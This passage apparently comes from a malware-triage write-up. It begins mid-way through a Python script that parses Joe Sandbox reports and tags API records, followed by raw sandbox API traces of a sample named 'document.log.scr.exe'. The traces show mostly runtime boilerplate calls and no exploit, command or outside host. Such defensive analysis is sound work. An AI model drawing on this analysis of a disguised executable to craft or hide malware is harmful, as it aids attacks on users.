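            section = line
            continue
        if cur is None or not line.startswith("•"):
            continue
        if section == "APIs":
            m = API_RE.match(line)
            if m:
                args = [a.strip() for a in (m["args"] or "").split(",") if a.strip()]
                cur["apis"].append({"subcall": m["sub"], "name": m["name"], "module": m["mod"],
                                    "args": args, "ref": int(m["ref"], 16)})
        elif section == "Strings":           # "• kernel32.dll, xrefs: 0042B4FD"
            cur["strings"].append(line[1:].strip().rsplit(", xrefs:", 1)[0])
        else:
            m = FIELD_RE.match(line)
            if m:
                cur["fields"][m["key"]] = m["val"]
    return blocks


def triage(block):
    """Tag one record from its direct calls; 'Part of subcall' lines belong to callees."""
    direct = [a for a in block["apis"] if a["subcall"] is None]
    names = {a["name"] for a in direct}
    tags = set()
    if "GetProcAddress" in names:
        targets = {a["args"][1] for a in direct
                   if a["name"] == "GetProcAddress" and len(a["args"]) > 1}
        # Vouch for the record only if every target is CRT boilerplate; an unresolved
        # target ('?' in the report) or any other name keeps it flagged.
        tags.add("crt-boilerplate" if targets and targets <= CRT_RESOLVED
                 else "dynamic-api-resolution")
    if names & {"ReadFile", "WriteFile", "GetFileAttributesA"}:
        tags.add("file-io")
    if names & {"WaitForSingleObject", "ReleaseMutex", "ResetEvent", "EnterCriticalSection"}:
        tags.add("synchronisation")
    return tags


SAMPLE = """\
APIs
• GetModuleHandleA.KERNEL32(kernel32.dll,0042EFE0,00000010,00427463,00000000,00000FA0,74DF0A60,00000000,00427125,00425E71,?,0042E598,00000060), ref: 0042B502
• GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionAndSpinCount), ref: 0042B512
Strings
• InitializeCriticalSectionAndSpinCount, xrefs: 0042B50C
• kernel32.dll, xrefs: 0042B4FD
Similarity
• API ID: AddressHandleModuleProc
• API String ID: 1646373207-3733552308
APIs
  • Part of subcall function 0042CF9D: _strlen.LIBCMT ref: 0042CFA7
• WaitForSingleObject.KERNEL32(?,000000FF,?,00000001,00000001,00000049), ref: 0040B3DB
• ReleaseMutex.KERNEL32(?,00000000,?), ref: 0040B3FC
APIs
• ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000003), ref: 00429528
• GetLastError.KERNEL32 ref: 00429532
"""
# Constructed, not from the report: a resolver whose target the sandbox did not recover.
CONSTRUCTED_RECORD = "APIs\n• GetProcAddress.KERNEL32(00000000,?), ref: 00401234\n"
TEXT = SAMPLE + CONSTRUCTED_RECORD

if __name__ == "__main__":
    for b in parse_blocks(TEXT):
        print(b["apis"][0]["name"], sorted(triage(b)))
```

Fed a full report export instead of SAMPLE, the per-record tags let you count how many GetProcAddress sites remain once the CRT ones are discounted; keeping the "Part of subcall" entries out of the direct-call set matters because the report repeats a callee's APIs under every caller, which otherwise inflates that count.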
                                                                  APIs
                                                                    • Part of subcall function 00426B77: _UnwindNestedFrames.LIBCMT ref: 00426B9A
                                                                  • InitializeCriticalSection.KERNEL32(00426CC1,00000003), ref: 0042B4D3
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1742963186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                   • Associated: 00000000.00000002.1742947373.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1742988255.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1743001516.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1743013214.0000000000434000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1743013214.0000000000440000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1743013214.000000000044C000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1743013214.000000000044F000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1743013214.0000000000453000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1743013214.0000000000455000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1743013214.000000000045A000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1743013214.0000000000462000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_document.jbxd
                                                                  Similarity
                                                                  • API ID: CriticalFramesInitializeNestedSectionUnwind
                                                                  • String ID: csm$csm$csm
                                                                  • API String ID: 2222982843-393685449
                                                                  • Opcode ID: acd91f781ee38c348a87f521f2261be69d72136644fc5ab93a629eaade7a4ad2
                                                                  • Instruction ID: f15770d1f245a1dc1dc769a00c4ac03cd43f694df1eb78c53a90dae53adbc7e3
                                                                  • Opcode Fuzzy Hash: acd91f781ee38c348a87f521f2261be69d72136644fc5ab93a629eaade7a4ad2
                                                                  • Instruction Fuzzy Hash: 7E719E35B00229DFCF14DF95E881AAE7BB5BF04314F96409BE810AB252C739D951CB9A
                                                                  APIs
                                                                    • Part of subcall function 0042CF9D: _strlen.LIBCMT ref: 0042CFA7
                                                                    • Part of subcall function 0042CF9D: _strcat.LIBCMT ref: 0042CFBB
                                                                  • WaitForSingleObject.KERNEL32(?,000000FF,?,00000001,00000001,00000049), ref: 0040B3DB
                                                                  • ReleaseMutex.KERNEL32(?,00000000,?), ref: 0040B3FC
                                                                  • ReleaseMutex.KERNEL32(?,?,?,00000000,?), ref: 0040B479
                                                                  • ReleaseMutex.KERNEL32(?,00000000,00000000,?,00000000,000000FF,?,?,00000000,?), ref: 0040B50C
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1742963186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                   • Associated: 00000000.00000002.1742947373.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1742988255.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1743001516.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1743013214.0000000000434000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1743013214.0000000000440000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1743013214.000000000044C000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1743013214.000000000044F000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1743013214.0000000000453000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1743013214.0000000000455000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1743013214.000000000045A000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1743013214.0000000000462000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_document.jbxd
                                                                  Similarity
                                                                  • API ID: MutexRelease$ObjectSingleWait_strcat_strlen
                                                                  • String ID:
                                                                  • API String ID: 3541652364-0
                                                                  • Opcode ID: bbe3c3d9775a934ed54bf2637917896e3d47ae8e4b803ca53556c35cce3aae03
                                                                  • Instruction ID: a78adba943f63fa3003e78eeb40ee91bd2e846ea5eff56f134e5d262998a29b7
                                                                  • Opcode Fuzzy Hash: bbe3c3d9775a934ed54bf2637917896e3d47ae8e4b803ca53556c35cce3aae03
                                                                  • Instruction Fuzzy Hash: B761C071900215AFCB14EF69D981AAEB7B4FF44304F50453EE416E7392DB38AA04CBD9
                                                                  APIs
                                                                  • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000003), ref: 00429528
                                                                  • GetLastError.KERNEL32 ref: 00429532
                                                                  • ReadFile.KERNEL32(?,?,00000001,00000000,00000000), ref: 004295FB
                                                                  • GetLastError.KERNEL32 ref: 00429605
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1742963186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                   • Associated: 00000000.00000002.1742947373.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1742988255.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1743001516.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1743013214.0000000000434000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1743013214.0000000000440000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1743013214.000000000044C000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1743013214.000000000044F000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1743013214.0000000000453000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1743013214.0000000000455000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1743013214.000000000045A000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1743013214.0000000000462000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_document.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorFileLastRead
                                                                  • String ID:
                                                                  • API String ID: 1948546556-0
                                                                  • Opcode ID: 3f785307c448bedb5446c6a9bf72b6bb0fc28e600880c9af1debf9112c80b894
                                                                  • Instruction ID: 0c3f56f59b5ddb8de00e56d924bfdf09652d2d5f3f214e5ba9bd8ddb3cf10382
                                                                  • Opcode Fuzzy Hash: 3f785307c448bedb5446c6a9bf72b6bb0fc28e600880c9af1debf9112c80b894
                                                                  • Instruction Fuzzy Hash: DB61C6317043A59FDF218F58D884B997BE0BF11308F94449BE5658B291C378DD46CB5A
                                                                  APIs
                                                                  • WriteFile.KERNEL32(?,?,?,?,00000000,?,00000000,00000001), ref: 0042BD87
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1742963186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                   • Associated: 00000000.00000002.1742947373.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1742988255.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1743001516.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1743013214.0000000000434000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1743013214.0000000000440000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1743013214.000000000044C000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1743013214.000000000044F000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1743013214.0000000000453000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1743013214.0000000000455000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1743013214.000000000045A000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1743013214.0000000000462000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_document.jbxd
                                                                  Similarity
                                                                  • API ID: FileWrite
                                                                  • String ID:
                                                                  • API String ID: 3934441357-0
                                                                  • Opcode ID: f012d2ce11893e90015ea5c14048fdc879c812517038c19f2c3335cefbc8be64
                                                                  • Instruction ID: b69cdc61513ac084dd584beffdc22afea9c25ed320d97ba110819b699bdfb182
                                                                  • Opcode Fuzzy Hash: f012d2ce11893e90015ea5c14048fdc879c812517038c19f2c3335cefbc8be64
                                                                  • Instruction Fuzzy Hash: 7F518D31A10268CFDB32DFA9E880BEDBBB8FF45704FA1401AE9599B252D7344A01DF55
APIs
• __lock.LIBCMT ref: 0042C2C5
  • Part of subcall function 0042758B: EnterCriticalSection.KERNEL32(?,?,?,004255E1,00000004,0042E528,0000000C,004274A4,00000000,?,0042720A,?,0042E598,00000060), ref: 004275B3
• __lock.LIBCMT ref: 0042C311
• EnterCriticalSection.KERNEL32(0000008C,0042F618,00000014,0042C70F,?,00000000,00000000), ref: 0042C35B
• LeaveCriticalSection.KERNEL32(0000008C), ref: 0042C368
Memory Dump Source
• Source File: 00000000.00000002.1742963186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1742947373.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1742988255.000000000042E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743001516.0000000000431000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743013214.0000000000434000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743013214.0000000000440000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743013214.000000000044C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743013214.000000000044F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743013214.0000000000453000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743013214.0000000000455000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743013214.000000000045A000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743013214.0000000000462000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_document.jbxd
Similarity
• API ID: CriticalSection$Enter__lock$Leave
• String ID:
• API String ID: 885841014-0
• Opcode ID: 7e985fef4b773b36eea96ff8ad1ba3abeacee3e0040d83120a73aba8512290a5
• Instruction ID: 190f3578051f98c2978070aa1ace5d718f57cceca4cdef8a86f22cce7d92fca2
• Opcode Fuzzy Hash: 7e985fef4b773b36eea96ff8ad1ba3abeacee3e0040d83120a73aba8512290a5
• Instruction Fuzzy Hash: A3412531B007228BDB24EB65F88566E77A0AF01334FA5872FD461962D1CB7C8542CB5C
APIs
Memory Dump Source
• Source File: 00000000.00000002.1742963186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1742947373.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1742988255.000000000042E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743001516.0000000000431000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743013214.0000000000434000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743013214.0000000000440000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743013214.000000000044C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743013214.000000000044F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743013214.0000000000453000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743013214.0000000000455000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743013214.000000000045A000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743013214.0000000000462000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_document.jbxd
Similarity
• API ID: _strlen$___initmbctable_strcat
• String ID:
• API String ID: 109824703-0
• Opcode ID: 44cb392498c457a785b614b44fbaef805f722a37786de15f251c48ecf979d9cf
• Instruction ID: 5385ac430a30b69aec2053d85f27ee94e75532dfac9a54d499d343a2729e6959
• Opcode Fuzzy Hash: 44cb392498c457a785b614b44fbaef805f722a37786de15f251c48ecf979d9cf
• Instruction Fuzzy Hash: EC1189726064309FD728BF247D4062B7BA5FB403347A4017FED8183262DB3D9855D68E
APIs
• WaitForSingleObject.KERNEL32(?,000000FF,?,?,00419270,00000002,?,0000000A,00000000,?,?,?,?,?,?,?), ref: 004074AC
• ReleaseMutex.KERNEL32(?,?,0000000A,00000000,?,?,?,?,?,?,?,00000002,00000003,?,0000000A), ref: 004074C9
• ReleaseMutex.KERNEL32(?,?,0000000A,00000000,?,?,?,?,?,?,?,00000002,00000003,?,0000000A), ref: 004074DD
• ReleaseMutex.KERNEL32(?,?,0000000A,00000000,?,?,?,?,?,?,?,00000002,00000003,?,0000000A), ref: 004074F1
Memory Dump Source
• Source File: 00000000.00000002.1742963186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1742947373.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1742988255.000000000042E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743001516.0000000000431000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743013214.0000000000434000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743013214.0000000000440000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743013214.000000000044C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743013214.000000000044F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743013214.0000000000453000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743013214.0000000000455000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743013214.000000000045A000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743013214.0000000000462000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_document.jbxd
Similarity
• API ID: MutexRelease$ObjectSingleWait
• String ID:
• API String ID: 257779224-0
• Opcode ID: 7bb46ad1b88fb9a9461e7f10708a0b149a012f52996eac07301728bedeecd2fa
• Instruction ID: 3b8a7f17e4ebfe061791b5d315a4e5195bc8dd0f575c6c97dd90d4b1bd1d3e46
• Opcode Fuzzy Hash: 7bb46ad1b88fb9a9461e7f10708a0b149a012f52996eac07301728bedeecd2fa
• Instruction Fuzzy Hash: 4BF044773045009B8274DB1AEA04867B7A6FBD53213454A3AF542D3750C535FC06CA64
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.1742963186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1742947373.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1742988255.000000000042E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743001516.0000000000431000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743013214.0000000000434000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743013214.0000000000440000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743013214.000000000044C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743013214.000000000044F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743013214.0000000000453000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743013214.0000000000455000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743013214.000000000045A000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743013214.0000000000462000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_document.jbxd
Similarity
• API ID: Info
• String ID: $
• API String ID: 1807457897-3032137957
• Opcode ID: 9f2c1d363d286c5108caad8f61244589310624b698a3e47248c20c3c2974706b
• Instruction ID: 8a9144dc760d119363f862b2835ecdd30cff94b7cff921278a221d8c6e03feef
• Opcode Fuzzy Hash: 9f2c1d363d286c5108caad8f61244589310624b698a3e47248c20c3c2974706b
• Instruction Fuzzy Hash: 83416A302003786FEB168B54ED6ABFB7BE8EF06344F6444E2D585C71A2C3984A9587DC
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.1742963186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1742947373.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1742988255.000000000042E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743001516.0000000000431000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743013214.0000000000434000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743013214.0000000000440000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743013214.000000000044C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743013214.000000000044F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743013214.0000000000453000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743013214.0000000000455000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743013214.000000000045A000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743013214.0000000000462000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_document.jbxd
Similarity
• API ID: __lock
• String ID: $C$$$C
• API String ID: 1351747465-3751191682
• Opcode ID: 644a0982e1412aae1b84127758aa2c5dd4611e4ab37dedf937013aa29887e9e1
• Instruction ID: b1263411a33c7abb084cf6b3ba1c38a65e28a18038912d737f562992e4ca65ea
• Opcode Fuzzy Hash: 644a0982e1412aae1b84127758aa2c5dd4611e4ab37dedf937013aa29887e9e1
• Instruction Fuzzy Hash: 1B41A031F002248BCF28DF2AF8C556D3BA1EB59310BA5806BD809EB355C73CAD418B9D
APIs
• ___initmbctable.LIBCMT ref: 0042A999
• GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\document.log.scr.exe,00000104,74DF0A60,00000000,?,?,?,?,00425EB0,?,0042E598,00000060), ref: 0042A9B1
Strings
Memory Dump Source
• Source File: 00000000.00000002.1742963186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1742947373.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1742988255.000000000042E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743001516.0000000000431000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743013214.0000000000434000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743013214.0000000000440000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743013214.000000000044C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743013214.000000000044F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743013214.0000000000453000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743013214.0000000000455000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743013214.000000000045A000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743013214.0000000000462000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_document.jbxd
Similarity
• API ID: FileModuleName___initmbctable
• String ID: C:\Users\user\Desktop\document.log.scr.exe
• API String ID: 767393020-3851360081
• Opcode ID: fe242c3c7747c275fabc0e21f379b715d9f809c354b0570d9209d5f4ff350ee6
• Instruction ID: 44a9705287dc85e6541789c5441cd73dc39d0e17858977665928a33e7fa3aab4
• Opcode Fuzzy Hash: fe242c3c7747c275fabc0e21f379b715d9f809c354b0570d9209d5f4ff350ee6
• Instruction Fuzzy Hash: 26113AB2B00220ABCB11DBAABD4069B77F8EB44320F51057FFD05D3241D6B89E40C759
APIs
• __EH_prolog.LIBCMT ref: 00424767
  • Part of subcall function 0042509E: RaiseException.KERNEL32(?,?,0042D4D3,004301F4,?,0042E4A8,?,?,?,00424841,0042D4D3,004301F4,00432030,00413E01,0042D4D3,000000FF), ref: 004250CC
  • Part of subcall function 004255BE: __lock.LIBCMT ref: 004255DC
  • Part of subcall function 004255BE: HeapFree.KERNEL32(00000000,?,0042E528,0000000C,004274A4,00000000,?,0042720A,?,0042E598,00000060), ref: 00425623
Strings
Memory Dump Source
• Source File: 00000000.00000002.1742963186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1742947373.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1742988255.000000000042E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743001516.0000000000431000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743013214.0000000000434000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743013214.0000000000440000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743013214.000000000044C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743013214.000000000044F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743013214.0000000000453000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743013214.0000000000455000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743013214.000000000045A000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743013214.0000000000462000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_document.jbxd
Similarity
• API ID: ExceptionFreeH_prologHeapRaise__lock
• String ID: hB$string too long
• API String ID: 2277933175-4162919455
• Opcode ID: 500f2fd8ebba751ca1f3013d6e9013b7e826199f8acec9835136d86677b485bb
• Instruction ID: a0063198a6ad5418a60f27aa6fdeb6e5ae7cc0c3ac2dcd9628e5fcf86c67384a
• Opcode Fuzzy Hash: 500f2fd8ebba751ca1f3013d6e9013b7e826199f8acec9835136d86677b485bb
• Instruction Fuzzy Hash: 3EF08271B00138EAC700FBE5E90979D7774AF04319FE4416FE00165195CBFD5545CA5D
APIs
• HeapReAlloc.KERNEL32(00000000,?,00000000,00428E3C,00000000,?,00000000), ref: 00428872
• HeapAlloc.KERNEL32(00000008,000041C4,00000000,00000000,00428E3C,00000000,?,00000000), ref: 004288AB
• VirtualAlloc.KERNEL32(00000000,00100000,00002000,00000004), ref: 004288C9
• HeapFree.KERNEL32(00000000,?), ref: 004288E0
Memory Dump Source
• Source File: 00000000.00000002.1742963186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1742947373.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1742988255.000000000042E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743001516.0000000000431000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743013214.0000000000434000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743013214.0000000000440000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743013214.000000000044C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743013214.000000000044F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743013214.0000000000453000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743013214.0000000000455000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743013214.000000000045A000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743013214.0000000000462000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_document.jbxd
Similarity
• API ID: AllocHeap$FreeVirtual
• String ID:
• API String ID: 3499195154-0
• Opcode ID: 4826cc8e5656ae35a018f652000ba19a5e3c76ade9028320e3ddbe3c001d3ea1
• Instruction ID: 72779762a505b3105af33e06486f7e26f074df3cc48a41ce57bbcb179b6b58b0
• Opcode Fuzzy Hash: 4826cc8e5656ae35a018f652000ba19a5e3c76ade9028320e3ddbe3c001d3ea1
• Instruction Fuzzy Hash: 11116D303002119FD735AF19FC46926BBF1FB91366790563EF152C62B0C771A952CB08